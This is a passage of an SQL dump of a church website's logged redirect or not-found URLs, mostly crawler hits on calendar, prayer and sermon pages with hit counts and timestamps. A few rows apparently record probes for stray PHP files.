(1863, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/7/-', NULL, '', '', 1, 0, '2017-01-15 15:10:27', '0000-00-00 00:00:00', 301),
(1864, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/25/-', NULL, '', '', 1, 0, '2017-01-15 15:10:41', '0000-00-00 00:00:00', 301),
(1865, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/8/-', NULL, '', '', 1, 0, '2017-01-15 15:10:55', '0000-00-00 00:00:00', 301),
(1866, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/6/-', NULL, '', '', 1, 0, '2017-01-15 15:11:09', '0000-00-00 00:00:00', 301),
(1867, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1884/5/-', NULL, '', '', 1, 0, '2017-01-15 15:11:23', '0000-00-00 00:00:00', 301),
(1868, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/1/-', NULL, '', '', 1, 0, '2017-01-15 15:11:38', '0000-00-00 00:00:00', 301),
(1869, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1884/7/-', NULL, '', '', 1, 0, '2017-01-15 15:11:52', '0000-00-00 00:00:00', 301),
(1870, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/5/-', NULL, '', '', 1, 0, '2017-01-15 15:12:06', '0000-00-00 00:00:00', 301),
(1871, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/24/-', NULL, '', '', 1, 0, '2017-01-15 15:12:20', '0000-00-00 00:00:00', 301),
(1872, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/11/-', NULL, '', '', 1, 0, '2017-01-15 15:12:35', '0000-00-00 00:00:00', 301),
(1873, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1884/4/-', NULL, '', '', 1, 0, '2017-01-15 15:12:53', '0000-00-00 00:00:00', 301),
(1874, 'http://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/44-programme', NULL, 'http://www.google.com.ng/search?q=dream+centre+annual+school+of+ministry&btnG=', '', 10, 0, '2017-01-15 18:36:46', '0000-00-00 00:00:00', 301),
(1875, 'http://www.lifeoasisinternationalchurch.org/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/logo_img.php', '', 1, 0, '2017-01-15 20:44:58', '0000-00-00 00:00:00', 301),
(1876, 'http://www.lifeoasisinternationalchurch.org/prayer/55-day1', NULL, '', '', 7, 0, '2017-01-15 21:36:39', '0000-00-00 00:00:00', 301),
(1877, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/22/-', NULL, '', '', 1, 0, '2017-01-15 22:52:57', '0000-00-00 00:00:00', 301),
(1878, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/28/-', NULL, '', '', 1, 0, '2017-01-15 22:53:11', '0000-00-00 00:00:00', 301),
(1879, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/15/-', NULL, '', '', 1, 0, '2017-01-15 22:53:26', '0000-00-00 00:00:00', 301),
(1880, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/27/-', NULL, '', '', 1, 0, '2017-01-15 22:53:43', '0000-00-00 00:00:00', 301),
(1881, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/27/-', NULL, '', '', 1, 0, '2017-01-15 22:53:56', '0000-00-00 00:00:00', 301),
(1882, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/31/-', NULL, '', '', 1, 0, '2017-01-15 22:54:11', '0000-00-00 00:00:00', 301),
(1883, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/15/-', NULL, '', '', 1, 0, '2017-01-15 22:54:25', '0000-00-00 00:00:00', 301),
(1884, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/22/-', NULL, '', '', 1, 0, '2017-01-15 22:54:38', '0000-00-00 00:00:00', 301),
(1885, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/25/-', NULL, '', '', 1, 0, '2017-01-15 22:54:52', '0000-00-00 00:00:00', 301),
(1886, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/11/-', NULL, '', '', 1, 0, '2017-01-15 22:55:13', '0000-00-00 00:00:00', 301),
(1887, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/20/-', NULL, '', '', 1, 0, '2017-01-15 22:55:17', '0000-00-00 00:00:00', 301),
(1888, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/10/-', NULL, '', '', 1, 0, '2017-01-15 22:55:31', '0000-00-00 00:00:00', 301),
(1889, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/12/-', NULL, '', '', 1, 0, '2017-01-15 22:55:58', '0000-00-00 00:00:00', 301),
(1890, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/4/-', NULL, '', '', 1, 0, '2017-01-15 22:56:11', '0000-00-00 00:00:00', 301),
(1891, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/11/-', NULL, '', '', 1, 0, '2017-01-15 22:56:25', '0000-00-00 00:00:00', 301),
(1892, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/9/-', NULL, '', '', 1, 0, '2017-01-15 22:56:51', '0000-00-00 00:00:00', 301),
(1893, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/10/-', NULL, '', '', 1, 0, '2017-01-15 22:57:05', '0000-00-00 00:00:00', 301),
(1894, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/1/-', NULL, '', '', 1, 0, '2017-01-15 22:57:18', '0000-00-00 00:00:00', 301),
(1895, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/9/-', NULL, '', '', 1, 0, '2017-01-15 22:57:32', '0000-00-00 00:00:00', 301),
(1896, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/10/-', NULL, '', '', 1, 0, '2017-01-15 22:57:49', '0000-00-00 00:00:00', 301),
(1897, 'http://www.lifeoasisinternationalchurch.org/58-prophetic-words-for-day-6', NULL, '', '', 9, 0, '2017-01-15 23:43:19', '0000-00-00 00:00:00', 301),
(1898, 'http://www.lifeoasisinternationalchurch.org/index.php/157-day3', NULL, '', '', 5, 0, '2017-01-15 23:44:30', '0000-00-00 00:00:00', 301),
(1899, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/47-videos', NULL, '', '', 8, 0, '2017-01-16 00:04:25', '0000-00-00 00:00:00', 301),
(1900, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 4, 0, '2017-01-16 06:49:28', '0000-00-00 00:00:00', 301),
(1901, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/responsive', NULL, '', '', 1, 0, '2017-01-16 07:43:42', '0000-00-00 00:00:00', 301),
(1902, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/16/-', NULL, '', '', 1, 0, '2017-01-16 07:57:59', '0000-00-00 00:00:00', 301),
(1903, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/3/-', NULL, '', '', 1, 0, '2017-01-16 07:58:12', '0000-00-00 00:00:00', 301),
(1904, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/11/-', NULL, '', '', 1, 0, '2017-01-16 07:58:29', '0000-00-00 00:00:00', 301),
(1905, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/2/-', NULL, '', '', 1, 0, '2017-01-16 07:58:44', '0000-00-00 00:00:00', 301),
(1906, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/12/-', NULL, '', '', 1, 0, '2017-01-16 07:59:16', '0000-00-00 00:00:00', 301),
(1907, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/30/-', NULL, '', '', 1, 0, '2017-01-16 07:59:32', '0000-00-00 00:00:00', 301),
(1908, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/6/-', NULL, '', '', 1, 0, '2017-01-16 07:59:47', '0000-00-00 00:00:00', 301),
(1909, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/2/-', NULL, '', '', 1, 0, '2017-01-16 08:00:04', '0000-00-00 00:00:00', 301),
(1910, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/17/-', NULL, '', '', 1, 0, '2017-01-16 08:00:20', '0000-00-00 00:00:00', 301),
(1911, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/1/-', NULL, '', '', 1, 0, '2017-01-16 08:00:35', '0000-00-00 00:00:00', 301),
(1912, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/17/-', NULL, '', '', 1, 0, '2017-01-16 08:00:51', '0000-00-00 00:00:00', 301),
(1913, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/5/-', NULL, '', '', 1, 0, '2017-01-16 08:01:07', '0000-00-00 00:00:00', 301),
(1914, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/4/-', NULL, '', '', 1, 0, '2017-01-16 08:01:23', '0000-00-00 00:00:00', 301),
(1915, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/9/-', NULL, '', '', 1, 0, '2017-01-16 08:01:39', '0000-00-00 00:00:00', 301),
(1916, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/8/-', NULL, '', '', 1, 0, '2017-01-16 08:01:55', '0000-00-00 00:00:00', 301),
(1917, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/3/-', NULL, '', '', 1, 0, '2017-01-16 08:02:16', '0000-00-00 00:00:00', 301),
(1918, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/2/-', NULL, '', '', 1, 0, '2017-01-16 08:02:25', '0000-00-00 00:00:00', 301),
(1919, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/1/-', NULL, '', '', 1, 0, '2017-01-16 08:02:52', '0000-00-00 00:00:00', 301),
(1920, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-16 08:17:11', '0000-00-00 00:00:00', 301),
(1921, 'http://www.lifeoasisinternationalchurch.org/index.php/193-2015-day-17', NULL, '', '', 7, 0, '2017-01-16 08:38:00', '0000-00-00 00:00:00', 301),
(1922, 'http://ljmti.lifeoasisinternationalchurch.org/resources/', NULL, '', '', 1, 0, '2017-01-16 10:49:33', '0000-00-00 00:00:00', 301),
(1923, 'http://ljmti.lifeoasisinternationalchurch.org/home/advanced-bible-school/63-recent-news-update', NULL, '', '', 1, 0, '2017-01-16 11:47:44', '0000-00-00 00:00:00', 301),
(1924, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 4, 0, '2017-01-16 13:22:44', '0000-00-00 00:00:00', 301),
(1925, 'http://www.lifeoasisinternationalchurch.org/prayer/59-prophetic-words-for-day-7', NULL, '', '', 7, 0, '2017-01-16 14:13:20', '0000-00-00 00:00:00', 301),
(1926, 'http://www.lifeoasisinternationalchurch.org/prayer/54-day3', NULL, '', '', 5, 0, '2017-01-16 14:26:00', '0000-00-00 00:00:00', 301),
(1927, 'http://lifeoasisinternationalchurch.org/index.php/11-demo-articles/54-slide-04', NULL, '', '', 2, 0, '2017-01-16 14:45:12', '0000-00-00 00:00:00', 301),
(1928, 'http://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/54-slide-04', NULL, '', '', 1, 0, '2017-01-16 15:00:33', '0000-00-00 00:00:00', 301),
(1929, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/54-prayer-a-fasting-day-5', NULL, '', '', 11, 0, '2017-01-16 15:30:29', '0000-00-00 00:00:00', 301),
(1930, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/21/-', NULL, '', '', 1, 0, '2017-01-16 16:53:19', '0000-00-00 00:00:00', 301),
(1931, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/16/-', NULL, '', '', 1, 0, '2017-01-16 16:53:32', '0000-00-00 00:00:00', 301),
(1932, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/9/-', NULL, '', '', 1, 0, '2017-01-16 16:53:46', '0000-00-00 00:00:00', 301),
(1933, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/2/-', NULL, '', '', 1, 0, '2017-01-16 16:54:00', '0000-00-00 00:00:00', 301),
(1934, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/29/-', NULL, '', '', 1, 0, '2017-01-16 16:54:27', '0000-00-00 00:00:00', 301),
(1935, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/5/-', NULL, '', '', 1, 0, '2017-01-16 16:54:41', '0000-00-00 00:00:00', 301),
(1936, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/1/-', NULL, '', '', 1, 0, '2017-01-16 16:54:54', '0000-00-00 00:00:00', 301),
(1937, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/4/-', NULL, '', '', 1, 0, '2017-01-16 16:55:08', '0000-00-00 00:00:00', 301),
(1938, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/8/-', NULL, '', '', 1, 0, '2017-01-16 16:55:22', '0000-00-00 00:00:00', 301),
(1939, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1880/3/-', NULL, '', '', 1, 0, '2017-01-16 16:55:35', '0000-00-00 00:00:00', 301),
(1940, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1882/7/-', NULL, '', '', 1, 0, '2017-01-16 16:55:49', '0000-00-00 00:00:00', 301),
(1941, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/4/-', NULL, '', '', 1, 0, '2017-01-16 16:56:03', '0000-00-00 00:00:00', 301),
(1942, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1881/6/-', NULL, '', '', 1, 0, '2017-01-16 16:56:17', '0000-00-00 00:00:00', 301),
(1943, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/12/-', NULL, '', '', 1, 0, '2017-01-16 16:56:30', '0000-00-00 00:00:00', 301),
(1944, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/2/-', NULL, '', '', 1, 0, '2017-01-16 16:56:44', '0000-00-00 00:00:00', 301),
(1945, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/30/-', NULL, '', '', 1, 0, '2017-01-16 16:56:58', '0000-00-00 00:00:00', 301),
(1946, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/8/-', NULL, '', '', 1, 0, '2017-01-16 16:57:12', '0000-00-00 00:00:00', 301),
(1947, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/20/-', NULL, '', '', 1, 0, '2017-01-16 16:57:26', '0000-00-00 00:00:00', 301),
(1948, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/31/-', NULL, '', '', 1, 0, '2017-01-16 16:57:41', '0000-00-00 00:00:00', 301),
(1949, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/13/-', NULL, '', '', 1, 0, '2017-01-16 17:01:58', '0000-00-00 00:00:00', 301),
(1950, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 1, 0, '2017-01-16 17:16:56', '0000-00-00 00:00:00', 301),
(1951, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 2, 0, '2017-01-16 17:27:22', '0000-00-00 00:00:00', 301),
(1952, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2/sermons', NULL, '', '', 36, 0, '2017-01-16 17:31:19', '0000-00-00 00:00:00', 301),
(1953, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_imageshow&view=show&showlist_id=2&showcase_id=1&w=&h=&jsnisid=1353110207&Itemid=231', NULL, 'https://www.google.com.ng/', '', 3, 0, '2017-01-16 18:09:14', '0000-00-00 00:00:00', 301),
(1954, 'http://www.lifeoasisinternationalchurch.org/index.php/261-day-1-of-21-days-fasting-and-prayer-november', NULL, '', '', 13, 0, '2017-01-16 19:39:58', '0000-00-00 00:00:00', 301),
(1955, 'http://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 7, 0, '2017-01-16 19:54:06', '0000-00-00 00:00:00', 301),
(1956, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/17-sample-content-6', NULL, '', '', 2, 0, '2017-01-16 19:59:16', '0000-00-00 00:00:00', 301),
(1957, 'http://lifeoasisinternationalchurch.org/resources/seminar', NULL, '', '', 10, 0, '2017-01-16 23:18:32', '0000-00-00 00:00:00', 301),
(1958, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/13/-', NULL, '', '', 1, 0, '2017-01-16 23:47:57', '0000-00-00 00:00:00', 301),
(1959, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/8/-', NULL, '', '', 1, 0, '2017-01-16 23:48:04', '0000-00-00 00:00:00', 301),
(1960, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/29/-', NULL, '', '', 1, 0, '2017-01-16 23:48:19', '0000-00-00 00:00:00', 301),
(1961, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/15/-', NULL, '', '', 1, 0, '2017-01-16 23:48:35', '0000-00-00 00:00:00', 301),
(1962, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/3/-', NULL, '', '', 1, 0, '2017-01-16 23:48:50', '0000-00-00 00:00:00', 301),
(1963, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/20/-', NULL, '', '', 1, 0, '2017-01-16 23:49:05', '0000-00-00 00:00:00', 301),
(1964, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/23/-', NULL, '', '', 1, 0, '2017-01-16 23:49:21', '0000-00-00 00:00:00', 301),
(1965, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1875/1/-', NULL, '', '', 1, 0, '2017-01-16 23:49:36', '0000-00-00 00:00:00', 301),
(1966, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/4/-', NULL, '', '', 1, 0, '2017-01-16 23:49:52', '0000-00-00 00:00:00', 301),
(1967, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/7/-', NULL, '', '', 1, 0, '2017-01-16 23:50:07', '0000-00-00 00:00:00', 301),
(1968, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/8/-', NULL, '', '', 1, 0, '2017-01-16 23:50:22', '0000-00-00 00:00:00', 301),
(1969, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1874/1/-', NULL, '', '', 1, 0, '2017-01-16 23:50:38', '0000-00-00 00:00:00', 301),
(1970, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1875/11/-', NULL, '', '', 1, 0, '2017-01-16 23:50:54', '0000-00-00 00:00:00', 301),
(1971, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/9/-', NULL, '', '', 1, 0, '2017-01-16 23:51:09', '0000-00-00 00:00:00', 301),
(1972, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/5/-', NULL, '', '', 1, 0, '2017-01-16 23:51:25', '0000-00-00 00:00:00', 301),
(1973, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/3/-', NULL, '', '', 1, 0, '2017-01-16 23:51:40', '0000-00-00 00:00:00', 301),
(1974, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/3/-', NULL, '', '', 1, 0, '2017-01-16 23:51:56', '0000-00-00 00:00:00', 301),
(1975, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/15/-', NULL, '', '', 1, 0, '2017-01-16 23:52:12', '0000-00-00 00:00:00', 301),
(1976, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/10/-', NULL, '', '', 1, 0, '2017-01-16 23:52:29', '0000-00-00 00:00:00', 301),
(1977, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/2/-', NULL, '', '', 1, 0, '2017-01-16 23:52:47', '0000-00-00 00:00:00', 301),
(1978, 'http://lifeoasisinternationalchurch.org/ministries/outreach', NULL, '', '', 40, 0, '2017-01-17 01:01:56', '0000-00-00 00:00:00', 301),
(1979, 'http://lifeoasisinternationalchurch.org/core', NULL, '', '', 4, 0, '2017-01-17 01:16:57', '0000-00-00 00:00:00', 301),
(1980, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 3, 0, '2017-01-17 01:53:41', '0000-00-00 00:00:00', 301),
(1981, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-users/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-17 01:55:38', '0000-00-00 00:00:00', 301),
(1982, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/index.php', NULL, '', '', 8, 0, '2017-01-17 02:54:35', '0000-00-00 00:00:00', 301),
(1983, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/item/', NULL, '', '', 2, 0, '2017-01-17 03:36:05', '0000-00-00 00:00:00', 301),
(1984, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/sermons', NULL, '', '', 7, 0, '2017-01-17 04:32:54', '0000-00-00 00:00:00', 301),
(1985, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, '', '', 6, 0, '2017-01-17 04:50:25', '0000-00-00 00:00:00', 301),
(1986, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 3, 0, '2017-01-17 04:55:00', '0000-00-00 00:00:00', 301),
(1987, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/sermons', NULL, '', '', 3, 0, '2017-01-17 05:04:29', '0000-00-00 00:00:00', 301),
(1988, 'http://ljmti.lifeoasisinternationalchurch.org/digital/spirit-meat', NULL, '', '', 3, 0, '2017-01-17 05:16:33', '0000-00-00 00:00:00', 301),
(1989, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 51, 0, '2017-01-17 06:53:40', '0000-00-00 00:00:00', 301),
(1990, 'http://lifeoasisinternationalchurch.org/prayer/156-focus32-3', NULL, '', '', 1, 0, '2017-01-17 07:01:33', '0000-00-00 00:00:00', 301),
(1991, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/14/-', NULL, '', '', 1, 0, '2017-01-17 08:17:57', '0000-00-00 00:00:00', 301),
(1992, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/7/-', NULL, '', '', 1, 0, '2017-01-17 08:18:08', '0000-00-00 00:00:00', 301),
(1993, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/8/-', NULL, '', '', 1, 0, '2017-01-17 08:18:25', '0000-00-00 00:00:00', 301),
(1994, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/11/-', NULL, '', '', 1, 0, '2017-01-17 08:18:42', '0000-00-00 00:00:00', 301),
(1995, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/3/-', NULL, '', '', 1, 0, '2017-01-17 08:18:57', '0000-00-00 00:00:00', 301),
(1996, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/4/-', NULL, '', '', 1, 0, '2017-01-17 08:19:14', '0000-00-00 00:00:00', 301),
(1997, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/8/-', NULL, '', '', 1, 0, '2017-01-17 08:20:03', '0000-00-00 00:00:00', 301),
(1998, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/1/-', NULL, '', '', 1, 0, '2017-01-17 08:20:28', '0000-00-00 00:00:00', 301),
(1999, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/18/-', NULL, '', '', 1, 0, '2017-01-17 08:20:53', '0000-00-00 00:00:00', 301),
(2000, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/2/-', NULL, '', '', 1, 0, '2017-01-17 08:21:06', '0000-00-00 00:00:00', 301),
(2001, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/5/-', NULL, '', '', 1, 0, '2017-01-17 08:21:18', '0000-00-00 00:00:00', 301),
(2002, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1879/6/-', NULL, '', '', 1, 0, '2017-01-17 08:21:31', '0000-00-00 00:00:00', 301),
(2003, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/29/-', NULL, '', '', 1, 0, '2017-01-17 08:21:43', '0000-00-00 00:00:00', 301),
(2004, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/28/-', NULL, '', '', 1, 0, '2017-01-17 08:21:56', '0000-00-00 00:00:00', 301),
(2005, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/14/-', NULL, '', '', 1, 0, '2017-01-17 08:22:09', '0000-00-00 00:00:00', 301),
(2006, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/12/-', NULL, '', '', 1, 0, '2017-01-17 08:22:21', '0000-00-00 00:00:00', 301),
(2007, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1874/3/-', NULL, '', '', 1, 0, '2017-01-17 08:22:35', '0000-00-00 00:00:00', 301),
(2008, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/2/-', NULL, '', '', 1, 0, '2017-01-17 08:22:50', '0000-00-00 00:00:00', 301),
(2009, 'http://lifeoasisinternationalchurch.org/feed', NULL, 'http://lifeoasisinternationalchurch.org/feed', '', 34, 0, '2017-01-17 09:22:34', '0000-00-00 00:00:00', 301),
(2010, 'http://lifeoasisinternationalchurch.org/feed/', NULL, 'http://lifeoasisinternationalchurch.org/feed/', '', 32, 0, '2017-01-17 09:22:35', '0000-00-00 00:00:00', 301),
(2011, 'http://lifeoasisinternationalchurch.org/media/com_acymailing/css/css-6519469ace9dc29cf2caa5b8bed4a411.php', NULL, 'http://lifeoasisinternationalchurch.org/11-demo-articles/7-tutorials-and-guides', '', 23, 0, '2017-01-17 09:23:24', '0000-00-00 00:00:00', 301),
(2012, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 4, 0, '2017-01-17 10:13:57', '0000-00-00 00:00:00', 301),
(2013, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-17 11:07:34', '0000-00-00 00:00:00', 301),
(2014, 'http://lifeoasisinternationalchurch.org/book.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:28:16', '0000-00-00 00:00:00', 301),
(2015, 'http://lifeoasisinternationalchurch.org/wraper.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:28:22', '0000-00-00 00:00:00', 301),
(2016, 'http://lifeoasisinternationalchurch.org/page.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:32:02', '0000-00-00 00:00:00', 301),
(2017, 'http://lifeoasisinternationalchurch.org/shwrk.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:35:42', '0000-00-00 00:00:00', 301),
(2018, 'http://lifeoasisinternationalchurch.org/api.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:51:48', '0000-00-00 00:00:00', 301),
(2019, 'http://lifeoasisinternationalchurch.org/notlce.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-17 11:54:09', '0000-00-00 00:00:00', 301),
(2020, 'http://lifeoasisinternationalchurch.org/css.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-01-17 12:01:35', '0000-00-00 00:00:00', 301),
